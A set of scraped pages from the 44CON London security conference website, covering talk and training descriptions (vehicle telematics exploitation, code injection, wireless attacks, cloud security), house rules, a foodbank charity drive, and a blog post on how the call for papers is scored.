          Today, most vehicle manufacturers in the US connect their vehicles to a type of network and delegate controls to mobile or web applications upon vehicle purchasing. Thankfully in the US, security research for consumer devices is now exempt from DMCA which enables us to audit and assess our connected vehicles. Like many devices in the IoT space, a single software bug in connected vehicles can compromise the entire ecosystem.

          In this talk, we will demonstrate the methodology used to discover and remotely exploit vulnerabilities in Subaru’s STARLINK remote vehicle services, as well as discuss how car manufacturers can learn from these mistakes. After all, who needs car keys when your vehicle is “connected”?

           

          #####EOF##### About 44CON – 44CON

          About 44CON

          What is 44CON?

          44CON is an Information Security Conference & Training event taking place in London. It is designed to provide something for the business and technical Information Security professional.

          Why do 44CON?

          To bring the best in international Security training + speaking (as well as the best of local talent) to the UK at a reasonable cost.

          44CON is located in London, which allows for a wide variety of security professionals to attend from the UK, Europe and further afield.

          At the bigger conferences, getting time with top class security speakers is limited. At 44CON, you have great access to speakers, who are all willing to spend time and talk about their work. This is where interesting partnerships can occur.

          Don’t just take our word for it, check out what others have said about the conference on our media coverage page.

          Who’s behind it?

          Sense/Net Ltd is the company that holds the IP for 44CON. Sense/Net is an events management company set up by Adrian and Steve to run conferences and events. Our flagship conference, 44CON, is a public event bringing together the best in UK and International information security research and networking opportunities. If you would like an internal conference for your organisation, or have a requirement for a bespoke event, please contact us to discuss your requirement and how we can help.


          #####EOF##### Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites – 44CON

          Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

          Lab Materials for Advanced Wireless Attacks Workshop
          For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
          • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
          • A step-by-step lab setup guide
          • A detailed course guide to supplement the material covered in the workshop
          Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
          If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.
          #####EOF##### Code injections from beginner to advanced for defenders and attackers – 44CON

          Code injections from beginner to advanced for defenders and attackers

          Presented By: David Korczynski, ADA Logics

          Code injection is a technique that is becoming increasingly prevalent in attacks and data breaches. Both malware writers and dedicated penetration teams rely on these techniques because host-based intrusion prevention systems and enterprise organisations increasingly deploy whitelisted applications that are all lucrative targets to bypass security checks.

          In this course we will cover code injection from beginner to advanced. We will do a deep dive into the Windows API that makes injection possible and go through many existing techniques. You will be provided with source code and binaries of the code injection techniques and get your hands dirty by analysing real-world code injection attacks. We will go through how to detect each of the techniques and also observe how different endpoint protection systems deal with them.

          The course starts with an introduction to the course toolbox and the first well-known code injection techniques via “CreateRemoteThread”. We will then progress through more advanced and modern techniques like process hollowing, PowerLoader, Atom Bombing, reflective DLL injection and more, to reach our goal of an advanced understanding about contemporary code injections based on hands-on experiences and, by the end of the course, well-understood concepts.

          The 3 day course will take place on the 9th, 10th and 11th of September 2019 at the Novotel London West
          Cost is £ 1,950 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Provide students with a fundamental understanding about code injection techniques and the purpose of such.
          • To bring students up to speed with the latest code injection techniques including strengths/weaknesses of each technique.
          • To enable students to navigate the source code of code injection techniques.
          • To enable students to analyse code injection techniques manually via a debugger.
          • To familiarise students with how automated procedures for detecting and analysing code injection techniques work.
          • To reinforce the above knowledge through exercises and hands-on experience.

          Course Outline

          Day 1 – Introduction and first code injections

          Morning (9.00 – 12.00)

          • Introduction and overview of course
          • Introducing the toolbox

          Afternoon (13.00-17.00)

          • Understanding physical and virtual memory, and Windows processes
          • First code injection techniques (CreateRemoteThread)
          • Executing and monitoring code injections
          • Extracting code injection artifacts
            • Volatility
            • Sandbox(es)

          Day 2 – In-depth view on common techniques and real-world attacks

          Morning (9.00 – 12.00)

          • Recap of day 1
          • Reflective code injection (injections that never touch disk)

          Afternoon (13.00 – 17.00)

          • Constructing and analysing reflective code injection
          • Process hollowing and hooking
          • Constructing and analysing process hollowing
          • Deep analysis of real-world attack
            • Deep-dive into a real-world malware sample that heavily utilises code injections.

          Day 3 – Taking it to the next level with exploit-like techniques

          Morning (9.00 – 12.00)

          • Recap of day 2
          • Chaining code injections together like APTs

          Afternoon (13.00 – 17.00)

          • Introduction to Return Oriented Programming (ROP) and Data Execution Prevention (DEP)
          • Introduction to Windows shared objects and shared sections
          • PowerLoader – Targeted code injection using exploit-like features
          • Building and analysing PowerLoader
          • Real-world example of PowerLoader malware
          • Atom Bombing – Advanced code injection against any Windows process
          • Further code injections
            • Early-bird
            • Gargoyle
          • Course summary and conclusion

          Target Audience

          This course has a broad audience and is relevant for both defenders and attackers, as well as both programmers and analysts. All of the exercises throughout have source-code and binary-code available so you can go through exercises without writing a single line of code, while still understanding the material of the course in-depth. Specifically, you do not need to be a programmer to use the information from this course.

          Specifically, this course is aimed at:

          • Malware analysts
          • Threat analysts
          • Incident response
          • Red team professionals that build custom tools
          • Security engineers

          Prerequisites:

          It is expected that students have some information security experience and are familiar with concepts of programming, assembler and debugging. The course is not a beginner's course, but does not require you to be an expert in any of the three skills listed. We will start with early beginner concepts and then move to advanced topics later in the course. As such, the learning curve can be steep at times, but the course comes with many tailored materials that students can digest at their own pace, e.g. varying complexity in exercises.

          What to Bring

          Laptop with:

          • A modern processor (we will run virtual machines, so more cores is better)
          • At least 8 GB RAM
          • At least 50 GB free space
          • VMware Workstation Pro (we need Pro because of snapshots)
          • Windows 7 x64 and x86, and Windows 10 x64 virtual machines

          Students will be provided with

          1. Printed course book
          2. Source code and binary format of code injections introduced
          3. Examples of real-world malware that uses code injection techniques, including relevant and detailed analysis.
          4. Access to online platform with exercises and content

          About the Trainer

          Lead Instructor – David Korczynski, Ada Logics – @davkorcz

          David Korczynski is a researcher in software security and program analysis. He specialises in building tools to automate reverse engineering, be it custom malware sandboxes, static analysis tools, automatic bug finders, compiler extensions etc. He is a co-founder of Ada Logics, a company that specialises in advanced software research for high-profile industry clients. Ada Logics specialises in automatic program analysis for software security. David finished his PhD in Computer Science at Oxford University where he specialised in automatic analysis of malware that use advanced code injection techniques and other complex obfuscation techniques. He has carried out software security research in both industry and academia.

          Book your 44CON 2019 training course now!


          #####EOF##### 44CON Assistance tickets – 44CON

          44CON Assistance tickets

          Would you like to attend 44CON but don’t have the means to make it happen?

          We realise that not everyone is able to fund their own conference attendance. In partnership with our sponsors, we’ve launched an assistance program to provide the opportunity to attend 44CON to those who wouldn’t be able to come otherwise.

          We are pleased to announce that the first Assistance Sponsor for 44CON 2019, sponsoring two tickets, is Wire Security bvba. Watch this space for details of the 2019 assistance program and application process.

          The fine print:

          • Details provided for assistance ticket applications will be used for the selection process, event registration and hotel reservations in line with the 44CON Privacy Policy.
          • Assistance tickets are not transferable.
          • Attendance to the event is subject to the 44CON house rules.
          #####EOF##### Partners of 44CON – 44CON

          Partners of 44CON

           

          Conference Partners

          DeepSec

          https://deepsec.net

          Bringing together the world’s most renowned security professionals from academics, government, industry, and the underground hacking community.

          SteelCon

          https://www.steelcon.info/

          SteelCon is an event held in the North of England for anyone who is interested in how things work, how things can be broken and how they can be fixed. It’s for people who like to tinker with things, aren’t happy with something until they know how it does what it does and won’t let something be broken without trying to fix it. SteelCon 2018 took place on 3rd-8th of July and 44CON ran the soldering area, we hope you saw us there!

          Hack in the Box

          http://conference.hitb.org/

          HITBSecConf or the Hack In The Box Security Conference is an annual must attend event in the calendars of security researchers and professionals around the world. Held annually in Kuala Lumpur, Malaysia and Amsterdam in The Netherlands, HITBSecConf is a platform for the discussion and dissemination of next generation computer security issues. Our events routinely feature two days of trainings and a two-day multi-track conference featuring cutting-edge hardcore technical talks delivered by some of the most respected names in the computer security industry. HITBSecConf is a place where ideas are exchanged, talent discovered and genius celebrated.

          Suits & Spooks

          http://www.suitsandspooks.com

          Suits and Spooks London 2015 was held at the techUK facility in London. Following a fantastic event in 2014, Suits and Spooks London 2015 was our first 2-day international event. Speakers included Marina Litvinenko, the widow of the Russian FSB officer who was poisoned in London with radiation, EJ Hilbert of Kroll Associates, Zach Tumin of the NYPD, and many more. We’ll also have representatives from the British government speaking and in attendance, along with British Venture Capitalists and the usual mix of public and private sector participants.

          Media Partners

          O’Reilly

          http://www.oreilly.com/

          O’Reilly provides technology and business training, knowledge, and insight to help companies succeed in the face of huge economic and technological shifts confronting businesses today. Our unique network of security experts and innovators share their knowledge and expertise on the company’s comprehensive training and information platform and at the O’Reilly Security conference in New York.

          Community Partners

          BSides London

          http://www.securitybsides.org.uk

          B-Sides London, Security B-Sides is a community-driven event built for and by information security community members.

          BSides London 2018 took place on 6 June 2018 at the ILEC conference centre.

          CREST

          CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

          All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

          Follow us on Twitter: @crestadvocate

          44CON will be a community sponsor of CRESTCon 2019 that will take place on 14th March 2019 at the Royal College of Physicians in London.

           IISP

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

          Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

          At the heart of the Institute is the IISP Skills Framework©2012, which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes, including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body, and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees; it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience.

          More information about the IISP and its work can be found at www.iisp.org.

          ISSA-UK

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          RawHex

          We break things so you don’t have to. We build things so you can do, too. Home of the HIDIOT, the little computer you can build yourself.

          OWASP

          The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

           

          #####EOF##### 44CON House Rules – 44CON

          44CON House Rules

          44CON is welcoming to all. We’ve drafted these house rules to help you understand our guiding behavioural principle: Wheaton’s Law (“Don’t be a dick”). Our house rules aren’t perfect, they’re a work in progress and we’re open to suggestions via houserules@44con.com.

          These rules apply to everyone and all interpersonal interactions at the event.

          Expectations

          What we want you to get from 44CON: Knowledge. New friends. Job Opportunities. Good times.
          What we expect from you: Respect for others. Being kind. Not being a dick.

          Interpreting Wheaton’s Law

          Our crew leads are the arbiters of Wheaton’s Law. Their decision is final. If you’re given an instruction from a crew member, please follow it. If you’re given a warning, please heed it.

          Banter, a playful, friendly exchange of teasing remarks, is fine. If it’s not consensual, it’s not banter.

          Reporting concerns

          1. If you have a concern, please raise it with the clearly visible crew or at the front desk.
          2. Alternatively, please fill in a feedback form, anonymously if you prefer.
          3. If the above isn’t possible, please email houserules@44con.com with your concern.
          4. Everything is handled in confidence and we can provide space and support where needed.

          We welcome anonymous feedback, but it affects our ability to communicate outcomes.

          Grounds for removal

          We reserve the right to remove anyone from the event without reimbursement for, but not limited to, the following behaviours:

          1. Theft.
          2. Sustained harassment, discrimination or disruption.
          3. Acts of violence.
          4. Criminal activity.
          5. Any other reason where the relevant crew lead believes that your continued presence may cause a risk to the safety of yourself, others or where Wheaton’s Law has been breached to such a degree that you have acted an epic dick.

          Please note: Laws at home may not match those here. In particular, free speech isn’t protected, our computer crime laws are ridiculous and both harassment and discrimination are criminal offences.

          #####EOF##### Making Britain a Better Place For The Most Vulnerable – 44CON

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a rubber-keyed Spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric-a-brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

          #####EOF##### howto – 44CON

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          #####EOF##### 44CON 2017 – 44CON

          44CON 2017 Schedule Available.

          Here you go folks, the 44CON 2017 schedule is now available here.

          Go take a look at all the wonderful talks and workshops we have lined up for you! As with all things the schedule could be subject to some last minute changes so make sure you keep an eye out on the day so you don’t miss out.

          If you haven’t got your ticket yet there are some still available here.

          We look forward to seeing you all in September.

          CTF 2017

          This year we are delighted to announce that Immersive Labs will be running the 44CON 2017 CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          They will make their platform available to all 44CON participants, enabling you to take on over 150 cyber security challenges during the conference. Immersive Labs exercises combine both CTF style and sign-posted challenges ranging from Beginner to Advanced. 

          A real-time leaderboard will keep track of participants including the individual labs they’ve completed. Immersive Labs will be providing opportunities for the top 10 users to become “Immersive Original” lab producers which attract a £1000 payment for each lab.

           

           

          Network Forensics: A blog post by Erik Hjelmvik

          I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past 10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

          I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

          The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

          You can find more details about the training here.

          Early Bird Tickets Sold Out!

          We opened our Early Bird Tickets last week and kept it quiet to give people a chance to get them, then when we announced them on our mailing list they went within an hour!

          If you missed your Early Bird Tickets, fear not. Our CFP is still open. If you have a great workshop or talk idea, don’t forget that accepted talks and workshops include free attendance (and in most cases cover travel and accommodation from anywhere in the world). We wrote a blog post on how to boost your chances here.

          If you’re itching to buy a ticket, regular tickets open at 8am GMT on the 10th of March, and will be available in our online shop.

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and voting slowly dribbles off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us; don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along, just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          44CON 2017 Sponsorship Opportunities Available

          44CON 2017, now in its seventh successful year, is recognised as a “must-attend” conference for security professionals. Offering unparalleled networking, cutting-edge presentations and thought leadership across the information security arena, we aim to ensure attendees have a great time. This year we had over 400 people attend; that, together with speakers from across the world delivering awesome talks on relevant and up-to-date topics, makes 44CON one of the UK’s premier conferences.

          44CON 2017 will take place from the 13th – 15th September 2017 at the ILEC Conference Centre, London. There will also be a number of training courses taking place before 44CON 2017. If you have a training proposal you wish us to consider, please email emma@44con.com for more information.

          If you wish to become one of our awesome sponsors, then please take a look at our 44CON 2017 sponsor pack. If you have any questions or want to discuss any of the opportunities further please email sponsorops@44con.com

           


          #####EOF##### Cloud Security and DevSecOps Workshop – 44CON

          Cloud Security and DevSecOps Workshop

          Presented By: Paul Schwarzenberger

          Public cloud services are now mainstream, and growing at a massive rate, as organisations launch new applications in the cloud and migrate existing systems. Along with the rapid move to the cloud, there is an equally revolutionary shift to DevOps, infrastructure as code, and adoption of agile software development approaches.

          Taken together, broad access to public cloud services, combined with the dynamic nature of DevOps, introduces a multitude of new risks, methods of attack and potential security issues.

          This course provides a hands-on introduction to cloud security and DevSecOps, covering new attack vectors and risks, common mistakes and misconfigurations. Methods of protecting applications and data in the cloud are explored, ranging from secure cloud architectures, to security tests integrated to continuous integration pipelines, cloud security services, continuous cloud compliance, and automated cloud security operations.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Knowledge of AWS and Azure services, secure architectures and best practice
          • Hands-on experience of AWS and Azure security features and services
          • Understanding DevSecOps approaches, technologies and tools
          • Practical use of CI/CD pipelines incorporating security testing
          • Container and serverless architectures, security issues and controls

          Course Outline

          Day 1:

          • Introduction and cloud concepts
          • AWS core services
          • AWS lab – build serverless web site using CloudFormation template
          • AWS security services
          • Azure core services
          • Azure lab – deploy infrastructure and implement security improvements

          Day 2:

          • Azure security services
          • Continuous compliance and automated assessment tools
          • Continuous compliance lab – assess security of an AWS account
          • Container concepts, architectures and container security
          • Serverless architectures, serverless functions, security risks and best practice
          • DevOps and DevSecOps
          • DevSecOps lab – CI/CD pipeline for serverless application with integrated tests

          Target Audience

          Security engineers, security architects, security operations and DevOps looking to develop their understanding of cloud security and DevSecOps with a view to designing secure systems, preventing attacks, detecting security issues and establishing automated remediation.

          Penetration testers, ethical hackers and red team personnel interested in extending their knowledge of cloud security risks and issues, common misconfigurations which can be exploited, and the use of automated tools to assess security of cloud infrastructure and applications.

          Student Requirements

          No particular experience required, however any knowledge of cloud will be beneficial.

          What to Bring

          • Laptop with Amazon Workspaces client installed (see below)
          • Mobile phone (for authenticator app)

          Software Requirements

          Before coming on the course, download and install the Amazon Workspaces client on your laptop from https://clients.amazonworkspaces.com/.

          After installing, open the application while connected to home WiFi or a mobile network. Press the Network status symbol at the bottom right hand corner to view detailed status. Ensure that all items have a green tick as shown in the screenshots below.

          Also please install the Google Authenticator app on your smartphone.

          Students will be provided with

          • Amazon Workspaces virtual desktops for the labs, with all necessary software and tools preinstalled
          • AWS, Azure and GitHub credentials to be used responsibly during the course
          • Electronic copies of the course presentations, electronic and paper copies of lab guides

          About the Trainer

          Instructor – Paul Schwarzenberger @paulschwarzen

          Paul is a cloud security architect and DevSecOps specialist with over 15 years' experience leading a wide range of security-related engagements for customers across sectors including financial services, pharmaceutical, retail, education and media, logistics, UK Government and Police.

          Paul uses an agile DevSecOps approach to lead the implementation and migration of critical systems to public cloud, with demanding security and compliance requirements for protection of personal data, detection and prevention of cyber-attacks and financial fraud.

          Recent conference presentations include:

          • Security BSides London 2018 – How to take over a production system in the cloud
          • DevSecCon London 2018 – A journey to continuous cloud compliance
          • IISP CrestCON 2018 – Why cloud security is different

          Paul has numerous security qualifications, certifications and memberships including MSc Information Security Royal Holloway, M.Inst.ISP, CCSP, CISSP and AWS Certified Security Specialty.

          Book your 44CON June 2019 training course now!

          #####EOF##### Terms of Service | Sense/Net

          OVERVIEW

           

          This website is operated by Sense/Net Ltd, 34 Westway, Caterham on the Hill, Surrey CR3 5TP, United Kingdom (registered in England, No: 07620524). Throughout the site, the terms “we”, “us” and “our” refer to Sense/Net Ltd. Our VAT number is GB 16 0558 37 990. Sense/Net Ltd offers this website, including all information, tools and services available from this site to you, the user, conditioned upon your acceptance of all terms, conditions, policies and notices stated here. 

           

          By visiting our site and/or purchasing something from us, you engage in our “Service” and agree to be bound by the following terms and conditions (“Terms of Service”, “Terms”), including those additional terms and conditions and policies referenced herein and/or available by hyperlink. These Terms of Service apply to all users of the site, including without limitation users who are browsers, vendors, customers, merchants, and/or contributors of content.

           

